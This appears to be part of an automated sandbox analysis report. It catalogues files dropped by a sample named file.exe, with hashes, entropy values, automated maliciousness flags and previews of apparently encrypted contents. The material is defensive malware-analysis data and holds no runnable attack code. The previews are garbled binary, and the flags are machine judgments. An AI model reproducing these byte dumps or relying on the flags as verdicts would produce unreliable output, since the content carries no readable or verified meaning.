          Preview:.f.5.....Dl.!.......D..t*.............{...2.....Lo...3...#[..;!...%...0.VR.x....U.o..0.V[}......3........l..4="..@?....t.G....*...zI..,...a...W.`l...k...41..-=l<.......w.7......g2u..E..9....M!ZQ4....H..._..a.=.+...;.Mh.\...".`e\.>)..v..=..PT.I...V.(=..q....V......K.*.j.Y:.UG..#.3>.....3...ge.v._".".j..T+.s..b.=.2.*..R...|...9!.....5... Bj.x.DA^...;....i..F.....%..L.2.?..z.f.h.@.F.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):486
          Entropy (8bit):7.455885268495672
          Encrypted:false
          SSDEEP:12:qO+Hj19x5CmcL7/RyJr9YDi6ned2ixpZacii9a:sHPxAm2RCci6ned2iTkbD
          MD5:0B20A8654033BB5B5A5DA8BE29F6AB95
          SHA1:0D4A6FBBE955B2AF3213C957C7568788646922CD
          SHA-256:41DC65DE8D241E79AD59FFB9B541925C45FDBB74B1064E45BC08FB776F88A659
          SHA-512:6D4187D11596E7A2CE9FE6F45AE85B3967FDC0A1E24E8C1D2E3F487C267C9E9E424C58E51A14E6D7CCA4E759814FDBC86125E84D75ECFA83875884449DE242CB
          Malicious:false
          Preview:.f.5.$.G...p......s...c.B.P.b.. ..s.......)...-o#....k.9....l.....r...x...H.&}....\. Aw...;....e$j.w./...F..+P...y.-G9...1r.-......?.aG7'.6..o..7q~.O..c&.A.6/......D(.m..,O.9..K..,.....4h.......~.......+..[.he.0.s".u..n1].............b]......&T.X.k....8........|..5...0...q..\.]5...me..3.>;..s.NOlW... .S...,3.u..V...PI...GX,2t....." @..............s.`">...N...b......@....?.8."......%,e.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):790
          Entropy (8bit):7.709796402310573
          Encrypted:false
          SSDEEP:24:BZUmSrsipCQvRnbVv1efbphhfqQbiiTkbD:ImmjrhbVv1kfhPbXiD
          MD5:50F75FE776A1676AB3A09FC1E425F195
          SHA1:C27C6ED6EC4B73EEE23319AC0787EF57E865DBB8
          SHA-256:9E16B4B68FEAA2B01A0CEAA3428B953CC439F02986A868B82B4ADA653EFE4E3B
          SHA-512:CC30355B30068875AE9D1AEEA094266A026FC849C8D608309815AA576754058FEB42E5A74EBD138ABEE6A93B8055C7056A69E458CC181097751C3E6E969A0CC2
          Malicious:false
          Preview:.f.5.6...z.]......W.....W...Z$.8YYv..as./,>$.<z..k..a..Gw....=.6..0..^..:.$.[H.K.....-n#..6.@...oA..z@3u......>.t......).t..U.....7..5.c..b.\]..f..|...J.SU......(.|..x....X4).:....98..E.2W.F....%...-h...w-kX..Un..n...5+v.......#...f....X.~8..<qqXV.V...H..+..W.Q\.`#..n..7.+....B...a............l......z.^.....>....X7O..f..G.6,J........n...F.in9uxkyU)..G.]..i.7..=..d..d#,..*N.J.V`x. .......DON.(........;p...?....l.?.T!*...i.....h.....]j.~..$.Y..4...\&.7.*^q...F..i..t...}.X..N....3.O..V..f.V..O.).....n..D.r.$tX...s)..i]...Q..6.l........ Q.......H.....8..4............=$..3-_....j:......j;.c..a.YrEBU..................CM....e...'.Wf..v..!.JB.l.I...s~....w.(8..hA....fr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):660
          Entropy (8bit):7.682086738415105
          Encrypted:false
          SSDEEP:12:krEzG1A71h0gNPaBpXdwMdoeAraAI3DOaUIJoACTeIAVbDNj8aEh942ixpZaciik:0f1WoEP8pNtme4y3RVbhQaEhliTkbD
          MD5:74F6142940907E9FBD3089744E97C28C
          SHA1:420690C1C94C9CFC2ADC452095995FB5580BD938
          SHA-256:8DD9ED802AE8C6DBEF830FAC163F7175BED9DD57E76856621575014D6D2E31D5
          SHA-512:29558FE0365549CF06B1A6D82AD7BB38C41F7CBCC1A0E0E063DA36A8AB912B9E7614308CFC3B07AAAF1DEE850DB4DA3BA72261BA29975940BBA9E772B57EDF2F
          Malicious:false
          Preview:2023/.Ii.......f.\.h..~e$...nh\.};x8&=(.nU.N.....s./...+...f.A>!......j.<s*.E....O9..z......V...>..c..D....J.n.................j......y..w..s.~Xo...`J..... .~...O.b...k2D..O...Q1I.v.N.HjF.X.pn$.8+.xDp..0...........B.gHJ...E-......d.......o...%.K..L.0.p:.4..........G)63..BRt....qNg...Eo.<%...2G.|.K....`,...7......s.."X..AE...xB..Ssc]"@e1R...B?.t..X<.......G.....3*.H..3.....u..>4l .K..O......V.[..}..i{./.e......_x.6.au...lN....A..:u......r......:M.H.&...fz..ea"!2f..v}S.-.h?:..|u ._P~.GX^...."f...D.H..[..DH..Hl......+.}.....+..V.P.#d...j..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):5316
          Entropy (8bit):7.969408005846908
          Encrypted:false
          SSDEEP:96:xh0pq617R/BUydQBE6UxHjJ4MecBHAmfBI/BhAh6n0B7vEHSEKJp9:xh0pq6D/BALUHj6MjAm9s0BYal
          MD5:70FF11C2455FDE2DCCFC8F2A6C9CF1E0
          SHA1:54B13E2BC9E122EC765081F6085A29FB46793E83
          SHA-256:2D2398DD821B1C7C572E2B730172FB548A029383DC85B0E1E07BE70C36715023
          SHA-512:594525A5FAFF2DE65FD248B19F8F394FAC31C886360247D7A17E082F50F90EAD3BACB4F31C2A6D22F24141162C0F395C16CBC78F343B20B5B567297A0403DE7A
          Malicious:false
          Preview:.PNG..9...T.|...4......y....l-.J`IA.6........lp0k.kP.Z..z.'.$..<...2=..V..pf......-/......V........jE.Y...'.KS{.......',$....X..<..0.x(..7....u..Z&k..UI+a..b..."uTz.s..*.>...X+.......a..t.<.}V...'....qM.-i.....i.$/.QQ..&._.........@.D_Af7..........2(..J..@(....wc..=..o.[<.jS.j...<.....T.}.r.1k.......}).h.....eI.z..........!~.h.O?.8..B..|.D...oU..B......V.<....S.>...M..|)...g.P6.r0.tm..[...;...IRa<}8a.)..a...}..~....69.J.-(...~......e...>..s._..v.].=.Z...d];......N.^.......f..<......H'..$.r.v<..es.i%&xbI...Q.V.3r...y.3F.m>y+...cH....TOo_t..`.d&...W.b.f.>.&u."B\.....1..............E..^..zr.....Uy`4..=...9....c..`.q.O.5...)..o..$3...M/O..n9.^.:.E..J.n...|.h\m..Q).....J.E.|............?.x..(.im...M.."..`..2._&)....#..C.?..0..s...-.L.:x5.Z..~......3DJC.&.;m...[.H.4..1..R.P...!O......@W..R.c..?<.p...eyF}[....P..9a(..z...=.3;Z.~(..o/...zP........e.n.......3.FN..sFYw.I.M...w1E3R.[.=..f.L..H`....$...0...`.{Vc..Wd. ..._..e%.b.E:..I....@D..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):3748
          Entropy (8bit):7.949801891272755
          Encrypted:false
          SSDEEP:96:An5/+rFp78TZOXRXxgsPEeFHGgsBtekKyCrjLd2vEeb:An5GJpsZOXRissqGoXabb
          MD5:DF659F07249C759B0B831E164A44999E
          SHA1:B6D31CD845270466653B6092B9D7183D674AA41A
          SHA-256:ABE7F227821EAB923BBCFA6FBD3E074408EE52DA2956569A0C1116E8BA53A1E8
          SHA-512:DB7D9D8A71E677935B37644978C0ECB33EA24E8AF6F4654E8FD35DCDFA21CC76A2182445B5E0FCE2322527C19180C9090DBDA51AFB1E3536D0DAEEDF06792DAB
          Malicious:false
          Preview:{"fil..}.4.....c.Z...d+..`.J.@}Vh..g...../.-..X....^@.....<..W._.../......x!....W.....N5..{..A<...CZ......S.....O...R$b....m...2..cl..f.N..D0e..*..~...1*....o..[/!1.og.N1l.....4.....s .....'Nqc.oF..e......5#..Zp.d.E...e...y.-.9"......~.A.W..e.!...y...Y.xD.YR.:=~~j......L.... .....L....O.....ri...l*.P..zS....1...|&.a.....1._9.+KnV=..h%d.2.-....... ...4..y ..."5.{./."....y.DR4.~.b..r;...&@.a.D......K.....6.. ..B.R.. ...=...K....... .X_J]".\..y..;oH.;.)c...:.d..}A...=.E...#I.q....-.:$....L.".E_.....3z...=v..3..d0.at..D.l..&Q.......\..w<.....%.y7.5_....jl.'[\....e...%>.=.F1gSx/9}.i.....].....84...;...+.iv..Q...:I.......D.'z.5.\m.....f...@.2.9j..../.n.F...z._.-.....?../.._..=../....)l.?..bL.f.....=..oN.4s.b..=h.D..4.*M._...jU.B...v:........r.U..'....F.........r...N5..9.A..\.h.i....q.-^..8....p../.M..a.|.+pD..e..^.l.1.fO............4..Y.P.B.f..g.>..k...?..<..D.p...a..!..'c?x\N...80ryEN..G..a/_...K.......,..4...`..0.........^..}H...Y?:\.Sj...
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):18852
          Entropy (8bit):7.99085436042679
          Encrypted:true
          SSDEEP:384:RNN8J/CXJPlJszIWygFqZoj4+emXsZogq3KqUsZllcbD7DbsnmHFY:h881lJ08d0RFdc37fi9
          MD5:B8152B4E92B8D69D38AAD30BDD8587B8
          SHA1:766406AC9C6B60403BA3FD7885EB34C1F0C4A00C
          SHA-256:BB126886BA309E74E44510B2E3117DF1961432516648CDA7F558CA5DACDD6CB4
          SHA-512:31D4E9375AA294BB32559B091792129B9BDA4D7BF3D8F3E001C43D512F0A9ACE0E3693D7A8C9F76FD43DF42C058D83876F8EB1FDC82386ACF9918D37FABC3AD3
          Malicious:true
          Preview:[{"de.`...........Aa...L...q.4.:..e.......'.bDurF..g.l.......l.Ga=...'.'.e.~2..q.~..L.VU.[].|.=.(...Q*V .?.K.j...*}Hsb.....".P,.^.U.RwE.{.....c.r....j..f..#V.G.=.F..6.8......;(r..n....>MO..........u!.E....2..Y.$...o,..c&".x.....f.V..ic..9,.x..n...(nYH$.wF.H....5z!.....@.y.{..r..c..nH.<..Y.CN.;....R.N.3...|.#L...........M.umX.M{....*...2...>U...0..8..]...J.>H.ddc..&...D...R.".kC.G,..@..\...SX,A9..u?...!....C..~..v.D~F.e.#.V....m..%a..L+.6..9..:.."o...v....1$;..V......t..b..#|P..Z.f?.......P..]ZS....b..|.....9.........T@....X{mrr.?.y...._.o...X..>.Y..J...r'....b..2....'>m.lk>..I.X..68..x.+..&(.).t...........C..?..=.%.'V.A.....j.W5.3.L*<..g.....#..f..C?..q.......Q...g....>M.Y..)'..y}/.w\*..3W...L.q...a*z..vMf.....1.F....L.8....H...R..A..o.f...........h....L...9..)...R:r.............o.4.Gd.b...I....a...IF..zZ..9...D.-l...N?...wU.&...R^.2..H...}nH.1Z..m...A.`..(....k..%d}.G.D.qpdwN.Ib..G.H?,.I.......Zf..x.*/.+.....C@\.A{..'..H..@Q....
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1188
          Entropy (8bit):7.8181448767498765
          Encrypted:false
          SSDEEP:24:F42yhib1fGGv1tAqm0Ljh6JTR/DB9cpsiTkbD:NMipuC1/m0x6JTJDB9aFiD
          MD5:3C7E8FCAF42DA8E9B8F662EB33CEC7E1
          SHA1:BA97CCFF6AC5CE265E7F1222DD0BAB638EE8DE42
          SHA-256:47B0685BEF5B1AAE63A2A4562AC53E569A3E4A751D375914DA2D0CE223DBBA4B
          SHA-512:38327639EFC7649C0F674184A3BD83D6C6F65C9EF68FD5443723EDE9FC12C43A39E2BFFEDE4CCB5AD3F994BCF8D875B6E465E3A3EB0682559C02F7B84D705E43
          Malicious:false
          Preview:{. "o.!"...NT...B....G....&.**....M.iYE....e(h%.._.......^i|...a.`..I*..?YK....SZ.&..hn.S.......[..,.tE%S.+.<5..y.....vI.8*Vf..X.fm.^76....D.....@.,.e..tm0...%....T......X..e.(.W..."oM].s.^../tb...>$.....>..)..S..P............H.V....HJVP.......Ch.4..w....tz....X-..j.h..r..|+...`..Z......K./....?.a=..g.Fu...{L.......L..~$sj..s..;.......%..mm..4......4.Ak?..oWTK.<....5...I.. ....U$.e0..4..mzD.....OoD'..Ps..0.\.....z.-.i.K${......l....Yu]!$.......?.....k!b3]+G........!s...;njn.<.m.o..Z>..&.2.f[.@O}z.I...C..a...~9.c.I..T*/_.Q../.$(y...t>.j..L.z~..72.".M....$...."..{..F.J..-kp...]7.]..;0Mv..T&.]$..<b.8?....4vR.%Y._q...x.P8.~..E...an.bin.WP....Ab.kx..84M@.ah.....t]`...>0.`-...X...Q....]..1...p....}.@.{.^..[..im..9..I....J:..>B>..dm..1a%\........e6..]5....*............t3.....u.?Q~v'.w.....%...G.-a.3N.4......{..a.hK...fn=.v./.@..D".$..H.7?.aP.5...).v4[.-@T.....T.H(.....H..e^Pu...&...F.r..Z....Mi....C.....e.M..3|g.D.H..[.yb.x._!a...1l..;"....:.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):80603
          Entropy (8bit):7.9976382239212
          Encrypted:true
          SSDEEP:1536:lDy8MtNbBfELugSBX0U8Q7BjQtL4aHeLZmyym1vSsvt4hL/++3:lDy8MjFsLugSBXTstLlAZVyWvRirp
          MD5:7445471F786861018B18600D7E52BEF7
          SHA1:A8C69785A635F3CDFB9EE51BA948DA2EBBA992F0
          SHA-256:DC410F611FD3FBBA65FBEDF0A4EF2835AB08B2E2ED782363F13BC90E7E8B896C
          SHA-512:EAB0F2BC09E823F4E331D2C6320ACD94DF9FC5F67325F10544AFB062F8D4340F99A3925840F9B0718D3001169B57C2BC8876A3826F3AF4D4E3F76D01A589C508
          Malicious:true
          Preview:/*.. n...+.......d.*N.....7Z..f.;..i..q.x....h.....H.N.RC.....#j!.....*.O....bxLs..J..@0T..}k..l..'.t........\.vP...j.<..p.+..I?.Y.....z..p.68....;.<.%...2..F...l5g.8P....d..a.0./...Q.A....+.D....|...J<......u..K......I..'.....=..ib...z.E....7Vl..v.|.....z...V....K.........H.3....i....9gM&...3.N.(.w.W..B.}._S...mM..D..^S...3...U .......)<..x:G....f..(.......B.B.6.o.. I...I.&..hs.Q#....ek^..3i...H..<..-)F....PK.<.............o...gY..t....d>....TO..p.++....;9K...WS...7...B..!...v...I.D.+2k..xH1.P.QZ...[...#L}....Y..?..E..ky&...c.j.g.*.........<...;.Q8..........<."fn2<b....o=.*$....C.j. )..f...A.J.........m...g...._.T.'C$N{..i.....^i.h..`..>....#.9.y.W.&.g.l.....U..8.:u.......oB.>z.0....?.u...?G............G ..:.j...Q...=. |.4%.x.a._..+..LX.].'...<......7.qyd.>7.=.C...u=...e....EG.q..;.r.x.......:=.e.....Q....M...W..`:[..<..Un....6..:*^..~X:..=`..$q.....[J..q./ 4S......[.....~...6CC.e.}.w..>. \.;%..I...!......-...%...Lhp...I...g.-X@`..\9x....
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):2731
          Entropy (8bit):7.926739071459504
          Encrypted:false
          SSDEEP:48:HsXNA35QefB7cmvZauHlDKsyIjKB3jyBn8+1Ym8upW9uT28KzxbhiD:Hsu35QFmvYuHHOBzyB8+a6Qi
          MD5:49F68B9A1488FD508DC5DF623C5B9897
          SHA1:9265D12D1E618354AEFC4E768AFE33B04E00C367
          SHA-256:E95B304AE41819ABF90B792DB973CA462025E19E3794CEC4F3E765201229D10E
          SHA-512:7CDF7F400EC4F2CFCACCB7ADAD8808B0A7096769D00CB70D12CE932417C0CB0FDB1E21EE1BF44A56516D7BD2584C11001680B9B3B0E76A0F65DBF97C942F68A1
          Malicious:false
          Preview:{.. ....t..F....dgJpF.r..._..G.....a.Q..A...$K...e..Y............O<...y.d....r..kho}.........i..."..h..?.C..N.^Fv.-:.BZ.B..N.x..v.u...A.D..."...O{.v...L.[.W..Rs........+X...'o".....b......8]..w'.&....'....9......OD}d.K).s.r)...*o..B%......#......4..H.Z .H.5c..&mEj...c?X{?.$..R.e..RMG..u:S..J.U...4.U.#... ..........5#.....,p./..l...(.[.ii..jh..gbg....~...M..-j..sNd.....\....cB`..qC.sw.(8...R'jG7.y-..G.{u.F8........1...(K..1.<;..rs....Z..6_Oo...W....H&..j.i.ryGdZ.E.("i...7+.:..3...p._.*...~.[..&.$..4E.U..Z.5l.P..".ta.L..e...I....]..7...].kc..O...c.8.w...f.q.|..;Q.'.../.O..f<..<M.J.?.x.....x.U...Gw..........@......8B .......\.f.Q.t..I..Y...Q....._.$....g.q5Xz.8b.4<.@...\.....=...{..yZ(=.*.l.....^..)T.i.J....6..G.d8...o0.2...W._....AS:..-U....j...Y...j..N(..M.b.(......r..C..e...Y|....)......{.e......5.....;N...[=..........>f %..'L.2c?.._...<..#......K.i...D.._..Q."*)....C..(E...E....;u.&O..~.4v..r.w.-{.T.h.I..j.".j.t..+.t)C.1...U.o.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):625
          Entropy (8bit):7.632205328317597
          Encrypted:false
          SSDEEP:12:2iP0ut+E/f9Sl6Mim0aS8NYIp26LLk9fktGDMWUmTVMyEx+ujXldZyroMom1ZixU:2iPEe88aBNfcqiBUvIwVdZyLoUZiTkbD
          MD5:62971B440DA8224C83C9BB29BAC34221
          SHA1:257D501EBAFDBAB92D21F7242F43E697FBC7B3C4
          SHA-256:BFA96E089EFB7D8A94D6F6126BD8B415E64D1E83B176C33584FF8427B29D86C9
          SHA-512:7BEB2C04416055F2E68641054769DB39712263984278A6098648D3203B958B4C87FF5FF4AEF1C6C024B303096926EF03C6C5B8893D5EA4F73C0001DBC75A2EBB
          Malicious:false
          Preview:(func.t'.>.*.Y....I.....R..K..m8.-_.....n.A.......Z-..Q:.....rP.6g..'cJ.......#*h.e../...s...B.#....O.........8E.xpg.#.@.g.d...]K*O>K....Lk.B..$E&.I..X.v,.....T.g.[..s.}..D.a..Q~J...........8+..."..V....P...(...:p..2.r..." C...A].j.*..Z..l..y.+N..2r.....).o2-.3...85$:._.$..8....u...W...3..$~<`...7Hd...br&.g....SRj..gv47.6,...7..D.U...h.O..u*....dh5.V......r..z.......K.V.\...g:...wR..wM...!...[}..OVB{."#`.&..&...%Z9..-...n..f.3E..i..;i..?...(...0O...x@..lWKu.f.~...}..",.............P._....fW..o}/&..gd..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):11551
          Entropy (8bit):7.982136525230129
          Encrypted:false
          SSDEEP:192:yl/R9UJfySecmiVwqrKAdyEHJB+Q5o4PDFl9KHx0vfKR5nXO6tGK7:O+fcvgtKAddHJMQ5jbFXKu8ey
          MD5:1471C1ED6C661FCA37F6509FF7DF3D42
          SHA1:39DC41FB2EB654FE2FF8F1B8E0FA148B7B3177B9
          SHA-256:DE15B7A4D0671A757487BC4CA0AFB90A167CF572F068FA5FDCD10F6BFB919D6D
          SHA-512:E50A8F0DA842743F65EB47E7F7386BD34EE4894D5559F497A5542432B51526F8F182A4C56B30FC2A4FF813AEA91A83F27F33C9523B1CEED186410784BAE542D6
          Malicious:false
          Preview:{"fil.....j?...I..R....V.Va.l..-.."&.....U...~.jXE...b..%...?k..;M....g.Btr..V..5Vs..nc;..{|..%..+I.e..d...e.`..I.io.N..2......?....2|.....^.k 7......f...LA#D>B.....%z.....y7.:.I.*...f.~.[.0..1..P...'..7D..N..&.=0.j..!.{g`.6SY....W.p7...*..K..et..h....*M:.P..g...s.k._...E...<......}f..#...:".P....7..0.P1.*.._..G.......:..K....5.W.v.cv.] .k..=.5...h.fT..C......Z.t..F*.p.}...=.5go../.6).`..qA..p.L.V..}BH.[......<.y..4.[....K.O.E...W.t.....C...w...:....dj....m...w..4:...>.d...~...Z.s..{...OQ."..;..x.|R.flm....{$.H;.y...:~.`.G..o?..t.N}:i~A.sm.U.3|. .y."e.....x.c.q.....\.......}.....{(....E&.#.cV.~.2...\.u^vG.h9....].;..o...D..zI|.tn.......=......M.E.6`..7.]..i].....$([.U)f....P.H.D...x...w.....:t'.!1...)L..6...&h].O.7\R{-,.e...C.{h ......S..\|Z..*Pf.x..D....|5w?.Zv.\.b..Do...=.1v..(1o...PKp.w.X.W.%..\,.!...3..yM.IY{....Q.......aJS..'.].J&As....!.....lZ.n..R:..."j......4W.......Y....C.....!..S.....O..2...!.f......-k.47o...U....$P..JiL.y....`.Mr
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):8114
          Entropy (8bit):7.976668811218798
          Encrypted:false
          SSDEEP:192:To0ptiZmfgtiEwWbne87uMy3UwkwT6J0itnK8OMec:TXLiMyz9uMy3Whpd
          MD5:38A68B0A5A739C01F9C2BA24DDEAFC9E
          SHA1:593F6FB4DCF72B2CF0C55767C878C4344C86665A
          SHA-256:00A9D6E784C38AD0E54784A3BA271FD81284BAC5A4A7D470ADC6526D0403F8DF
          SHA-512:F2982ABD83B7F068F6F991BD2DE41C9620956CD01EAD94E253FA1516A55642DCBF055F22EB58B68FB8E5ADA0088EC5DC62AC72317E43B4D3652B4AF13173DE5D
          Malicious:false
          Preview:[{"de....g=xI9).H.S^5'...;..ME....%..].d......../i...r..IB.F\b..l.}.........'.%.0....e.....-2@_.Z......./Z..k.h.+.|s....x9..D...[.i.5O...t"E..?.....1.:...._.K.tu.;..8.%...\.+..&C..{?...S...3...h......V..+..]8....[O.h..Uy.....u.U..>,....&4}...,@[..[d.6....T....$H.y..*.X.....:....x.=...].B-.1...y...$P...|.j......S...&".&VJ...y.L.. ....z/.:....7pkf... .|.w.$...r.\i....(...a..C..G...q..\ue`.j.#..[.1R....0..g...O@..Cq...3!.=v....!y.o@..n..p..i?....[..;.h.........q`.:.....1...H]R...v.mi...8.~.`zZ.S..Sc7ZI.G..@b."_gD.O.N......b..yp..~...AX..8n..Oy.L.....(.l......QH-...l...PH....p..c...#".]......j..8.F.j../x....~.E./.,.A....!..v..>.K..W..G.....e.4.y.~....XG0..Q.69.X:6@t..f1..S.A0Z}.s..j&^...)94oE.H8.\c.....2Fgv....r.|......W...I....{.~o_y..h..F"2....k=.\.;...'S....=!..h..bP.t....o.L.4XL.9v..(.....lU..g..V.h.>i....6.L.k.,......1V.<..._.imN=.......k....c#O(!..4..%.^...S.(/....f...ZK!i......\<..b+.J.N?....WM........."B]...D..h.:.?..L.....}.g2H.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):544977
          Entropy (8bit):6.601350029179023
          Encrypted:false
          SSDEEP:6144:FhdOEnXjosAY2OXSl5MhqcmrRXqbe5Dq31IVlMqX+wd5/CcMMJcRULt0NjyTOEzZ:dT1Adkc
          MD5:BA61D7D1E0F20E425B2A18AE1AA6BCDD
          SHA1:6903BA06554207D3476629D606D2B7F29519426C
          SHA-256:674D12F560A4254ED74644A7EDBEC51679265A3C0BB663B2B4846E2BBA8C6C4A
          SHA-512:E12008DFF1466FDEB4E23783076AAB80588DB8E415CF99289F2D052F7BFBBF107466F38E01A8C32FFEDB26B4756258CA7127ADD2BA3D282F6647E563751CE376
          Malicious:false
          Preview:/*.. .(...Y4.PFI..O*...m..8...2..v.Lv.:.Z`..Ja.vt....fZ#........x.s.Zi<ji.8..H.mC...p....vg._..U....Oj...7.,.W...p.6uC.{.F..+.....C..D...;F.'T.q.?d....Q.1T?.q~......b..2rk_$....!.]V.....yd.....]%u.?.J.+]t?Hv.+%.-._.....J.....^.M..x.eM.9>.T............Vq..gN.S...=..rm.!A.C..M.)*..e.?.c)........+..u.4b.l..(....f9..4.Z..p....l.\.-.O....hT... I..cF'~..#..Z..3].W.d..k.0....Lx.7...n.J9c...igw\.W.$|..7..#=Gf.M.J...n.e`W..iq.V.h.P..{.a..'........[..>...l#....7l..........a.oC#..,..=..=...*1>.+..Ir].!7.+/.K.....IB......T..r...D...b.)qi.*.....X..........Mx..@........P..6iQ.....F^.\...^.....% g.k.....Mvu.-j.. 0.kZ........x.+.[.....q'....i..^.2.s.7............".u......2..8gK?........)...sT.+...%.[.t._......t....z..t.z.j.*.(.N.l.8(..oA....FQ...V....%.8v.'.:8.9X...I..QZSr..Qb8..i...K......Z....S8.T...@.c...../.-X,..n3T[7!?L..3.6.q<Lo..*......B...4....... .C.....q..y.&;....F.W...o.9v...4..0a....3;..... :..v)_....V4..d..Q.e..)..1FK..c.o8L".....b.....c....U
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):261650
          Entropy (8bit):7.486136856966687
          Encrypted:false
          SSDEEP:6144:H2ArLktOEtXbY/cpZHjuBg8mx9FNNsZ9Dd/ce5:HrrZ+TZDu68IFIBdH
          MD5:97C1D565A9B3FF1D99CBE5D2873641C4
          SHA1:A0FF1D1B820F0E225F4F6705522B5740500C341F
          SHA-256:6BB56F240DB60898EF49073813CC313B63458B6E73091E1565072329BA7EFD1A
          SHA-512:9F7F022A3956C36F1CB1A3534F49C7ED79667E80F819B4D6BEACB0F10073BAAC37E7E92DF82A161FF5CEBA52294BA96E40E0C583AEDE8CDDFD240DA480ADC1F0
          Malicious:false
          Preview:/*.. .|...I{znEk=\.bU....u]....s.y.oQ.....*.{..*.s..M.!.......%.:....>......../=s.8}.X.-J&P.]...R.s.K...L.t.4.%.[S.L/M.Y.....=..-Y.......7.....f])./..]i...-..G.)rTeY...c....l..q...G..zg.Y.^....<x.|...q-M..X. ..~r.d..1.._.]....G`S..$..M.5+}{.W..$..p.p.,.f*....H....G[.......v.h....yF......%....*..,...F[...q+.Ug[6..}.....?....8...b..A.3i..5^......b..f.......'W8E.....IF..q..m./;^M.O..0..E..kPn....Z...........bm.>.....zP.v3..v..#..A.#..a.lZ.._.j.~,..k.&.Os.94..S..E'..l..#.&.n( B..n.+..fh.8.(..\n..S....'.N...I4.%i..G.1A...(....:.<K.......n.^..`.i..........f.i.r"...j.}..D...K...Z.1.c.h.V. ..f*z...&...uM...;.D.......x.hU@...#..$...Z.D(..."l..R.......r..1.MN....V[.Or@$..E.....6.......!.LN..{w...S..9S.Ly*..w...s....W,.o)...T...1.e..r..c.z.A.}sl..E..M.Gj..A......_.L.O.. ..-.s..J.3S3..L.%...+.H.h...}...FG.r....d_.3....Q-Q_[u....Q......qg....0...f/.Gt[.=.O...G.G...;..'D,6x..h.....2....).K...d.b....f.+.O.. ..a.f..>..9...u....q"...#.....f
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):2075
          Entropy (8bit):7.907916846666021
          Encrypted:false
          SSDEEP:48:SMn7rWe0DhjAUjJF/rVqS2NYwhs67P/NQMf2lr3hLniD:DnHlm53D/QNvT3xf2F1q
          MD5:D9B002834463289DE4C24D0E9610E1F4
          SHA1:8A8CACBB44DC1E40CEC9342A64045F0DA775FBD3
          SHA-256:482B7177CFDB8A511AF0C310306F5A5637B56E1D4711381AC7FA7B5B24F42818
          SHA-512:4DC8F4615D6862A50EBBE96D97845BBFB74002A0DAD803C066A18F9E4FF8B06C5759DC127C229164B5A1E36DCF264B1FA7F9E6056E7E37B002899054EA3FE8E5
          Malicious:false
          Preview:html,......>.jt......Ih'...L0{.0.rzI...6q..7|.3.IZ.,?.[}.....wV.....".n:.b...-.;.J...[...\1F......fP..r3'.........Q.y..D.\?......o.[.Vy.}..z..S.....1....^...cK.E6.R.H..o.-.]+@>l...Z..+.;.|q..)\LC.....pK...~.!!GJ.ifAvp..p\.+.......[..p.......Q...1c.C'uZ..S..htb.....e...Du.v..!.{..*|*(..T.{..`.s...}.....@$I.Q)...$.{..oz....g.V...a.*.J... Qf...nda.y. CG.t...'..k.t!_s.../..)D.tq....Y........1..3...8...i.~\...._9.0Mkt...@..w..4.......`...L....|".a.w.H^.:.qi.i%......E)..G..r2`...-..R:..%c....Zl=@.. m......[.AJ...2K......M..2.Y.@.^.. ......%.~.U[.@...J....<...Bix&Q..V...o<......@5..~JE......0_..@o..k..B.`+..9a.,+.._..x..5.jSH4....?u....a.I.t...M}.]..g+..sW.A.e.......k.....w.-.?....A.v5.U....A..5.c......Qa.?f..I........S...Z...m...?;$I..eRY.w|6.......@..U!.K..B...PZ>..W..H8..9......yzO..B.~.:..Fg-...wq...<.-...B@..#.%....Qm....[..Si.x]$.n..h@5*..o..z&..W.E......"(UT.c.J[.g.-D6JyxO.x...p",Q..|......Q..8...,V..\>..Z>.".%..`naa.....%,U..g...T.ZN...
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1144
          Entropy (8bit):7.8403142766764065
          Encrypted:false
          SSDEEP:24:/1NQJ8+0Q/5cpUeBNW6KTHY9b90FC9lVMOBQqiTkbD:/1aH5heBN24J93aiD
          MD5:DED199235711082FD88F936C2FA21D97
          SHA1:39741672C560BE0B6FB98648AC9393EAB474780C
          SHA-256:38D66984A5815E6A70FD55EDEAA03DB1B456DE429538AFC21B20178DB75B8BE3
          SHA-512:1DA844C70B67619D9557E4B26C1E0F535AD5D56E03CFF32B1F8908C1BAAAE91311864FE7A4E170F633CE9B5051886526DAF8349B0B50940890F0E1493E5191C9
          Malicious:false
